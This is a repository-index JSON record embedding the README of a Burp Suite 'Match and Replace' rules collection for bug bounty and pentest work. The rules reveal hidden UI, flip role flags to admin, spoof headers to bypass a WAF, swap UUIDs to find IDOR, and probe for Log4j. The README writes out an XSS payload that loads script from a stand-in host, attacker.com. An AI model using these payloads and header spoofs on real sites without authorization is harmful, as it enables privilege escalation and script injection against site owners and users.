{"id":13799814,"url":"https://github.com/daffainfo/match-replace-burp","last_synced_at":"2026-01-28T04:47:34.215Z","repository":{"id":37496647,"uuid":"488661870","full_name":"daffainfo/match-replace-burp","owner":"daffainfo","description":"Useful \"Match and Replace\" burpsuite rules","archived":false,"fork":false,"pushed_at":"2023-09-26T23:41:07.000Z","size":15,"stargazers_count":340,"open_issues_count":0,"forks_count":56,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-01-10T01:51:22.234Z","etag":null,"topics":["bugbounty","burpsuite","hacktoberfest","pentest"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/daffainfo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-05-04T16:23:29.000Z","updated_at":"2024-12-14T13:00:23.000Z","dependencies_parsed_at":"2025-01-10T02:02:08.687Z","dependency_job_id":null,"html_url":"https://github.com/daffainfo/match-replace-burp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/daffainfo","download_url":"https://codeload.github.com/daffainfo/match-replace-burp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240970411,"owners_count":19886558,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","burpsuite","hacktoberfest","pentest"],"created_at":"2024-08-04T00:01:06.308Z","updated_at":"2026-01-28T04:47:34.190Z","avatar_url":"https://github.com/daffainfo.png","language":null,"funding_links":[],"categories":["Custom Features","Others"],"sub_categories":[],"readme":"# Match Replace Burp\nUseful Match and Replace BurpSuite Rules\n\n## Finding hidden buttons, forms, and other UI elements\nMany websites contain hidden buttons, forms, and other UI elements, for example:\n```html\n\u003cdiv aria-hidden=\"true\"\u003e\u003c/div\u003e\n\u003cdiv style=\"visibility: hidden;\"\u003e\u003c/div\u003e\n\u003cdiv style=\"display: none;\"\u003e\u003c/div\u003e\n\u003cscript\u003edocument.getElementsByTagName(\"test\")[0].hidden=true\u003c/script\u003e\n\u003cbutton type=\"button\" disabled\u003etest\u003c/button\u003e\n```\n\n* Show Hidden UI (1)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166728753-b5b04276-fdf0-4102-bfee-7ac8fcd96cd4.png\" width=\"400\" /\u003e\n\n* Show Hidden UI (2)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166728896-5fb0c698-50bb-4213-b227-6389afaf3854.png\" width=\"400\" /\u003e\n\n* Change disable to enable\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166729298-56e7272c-86c3-4f08-b712-606568a0367f.png\" width=\"400\" /\u003e\n\n## Changing `false` to `true`\nSometimes hidden features can be unlocked by changing `false` to `true`. Examples:\n\n* Changing role from normal user to admin\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166739661-a6e54638-0fa1-464e-b765-4d52b7a223f7.png\" width=\"400\" /\u003e\n\n* Make email verified\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166739292-7bf7bd71-3d7b-4ba0-91e2-97b679c41a83.png\" width=\"400\" /\u003e\n\n## Bypass WAF\nBypassing a WAF by adding headers\n\n* Adding `X-Forwarded-Host: 127.0.0.1`\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166742712-f3208448-ec62-424f-98ac-db3aecb1326b.png\" width=\"400\" /\u003e\n\n\u003e Create another rule but change the header to:\n```\nX-Forwarded-Port: 127.0.0.1\nX-Forwarded-By: 127.0.0.1\nX-Forwarded-Scheme: 127.0.0.1\nX-Frame-Options: Allow\nX-Forwarded-For: 127.0.0.1\nX-Client-IP: 127.0.0.1\nX-Real-IP: 127.0.0.1\nX-Originating-IP: 127.0.0.1\nX-Remote-IP: 127.0.0.1\nX-Remote-Addr: 127.0.0.1\nX-Cluster-Client-IP: 127.0.0.1\nTrue-Client-IP: 127.0.0.1\nClient-IP: 127.0.0.1\nOrigin: null\nOrigin: Domain.attacker.com\n```\n\n## Finding IDOR\nBy changing the original user's UUID to another UUID\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166742159-f740ec61-cb94-4ee7-bacf-7ed5b00e26bb.png\" width=\"400\" /\u003e\n\n\u003e Create another rule but change the `type` to \"Request First Line\"\n\n## Finding XSS\nBy adding an XSS payload to the request\n\n* Finding XSS on `User-Agent`\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166749425-b9accf44-a606-473d-94c6-8e9562e02c07.png\" width=\"400\" /\u003e\n\n* Finding XSS on `Referer`\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166749753-d68eea0a-e290-4658-a2f1-cf66fcd89342.png\" width=\"400\" /\u003e\n\n* Auto replace user input with XSS payload\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png\" width=\"400\" /\u003e\n\n\u003e So just typing the word `xss_payload` on the website will immediately replace it with `\"\u003e\u003cscript src=https://attacker.com\u003e\u003c/script\u003e`\n\u003e Change the XSS payload as you like\n\n## MISC\nSome random match and replace rules\n* Finding [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166748175-6782ce51-b10f-4b1d-b8a3-610ef142d567.png\" width=\"400\" /\u003e\n\n\u003e Create some other rules to look for it in headers, parameters and more, because log4j can be found anywhere\n\n* Help companies identify your traffic and separate it from malicious traffic by adding a custom header\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166796789-e184716f-00a3-428d-9323-bcd985556798.png\" width=\"400\" /\u003e\n\nReferences:\n- https://twitter.com/PTestical/status/1413497660133318659\n- https://twitter.com/HolyBugx/status/1355472991061213184\n- https://twitter.com/intigriti/status/1192103070072741894\n- https://twitter.com/payloadartist/status/1469582893772984322\n- https://twitter.com/payloadartist/status/1422247377516122114\n- https://twitter.com/hackerscrolls/status/1247177578269597698\n\n\u003e Will be updated again soon\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp/lists"}